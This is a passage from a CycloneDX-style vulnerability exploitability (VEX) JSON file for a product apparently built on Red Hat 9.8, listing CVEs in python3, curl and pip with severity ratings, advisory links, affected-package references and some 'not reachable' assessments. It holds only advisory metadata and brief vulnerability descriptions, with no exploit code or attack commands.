          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8286",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A vulnerability exists where a new transfer that uses STARTTLS to upgrade the\nconnection might reuse an existing live connection even though the TLS\nconfiguration mismatches so it should not.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8286"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8286.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-32xh-3x3c-6g6h"
        },
        {
          "url": "https://hackerone.com/reports/3718195"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8286.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8286"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8286"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T19:42:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8643",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22
      ],
      "description": "pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory.",
      "recommendation": "Upgrade pip to version 26.1.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8643"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/01/5"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34456"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34739"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34740"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34741"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34748"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34749"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34750"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34752"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34756"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34758"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34765"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34772"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34773"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34774"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34775"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34776"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34777"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34778"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34780"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34891"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36193"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36315"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50479"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8643"
        },
        {
          "url": "https://bugzilla.redhat.com/2460927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8643"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-36315.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:36193"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2026-196.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb"
        },
        {
          "url": "https://github.com/pypa/pip/pull/14000"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8643.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-36315.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8643.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8643"
        }
      ],
      "published": "2026-06-01T17:17:35+00:00",
      "updated": "2026-08-19T12:18:40+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/pip@26.0.1"
        }
      ]
    },
    {
      "id": "CVE-2026-8924",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw in curl\u2019s cookie parsing logic allows a malicious HTTP server to set\n'super cookies' that bypass the Public Suffix List check. This enables an\nattacker-controlled origin to inject cookies that curl subsequently scopes and\ntransmits to unrelated third-party domains.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8924"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8924"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8924.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hm6c-rc5h-32m9"
        },
        {
          "url": "https://hackerone.com/reports/3733905"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8924"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8924"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:06:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
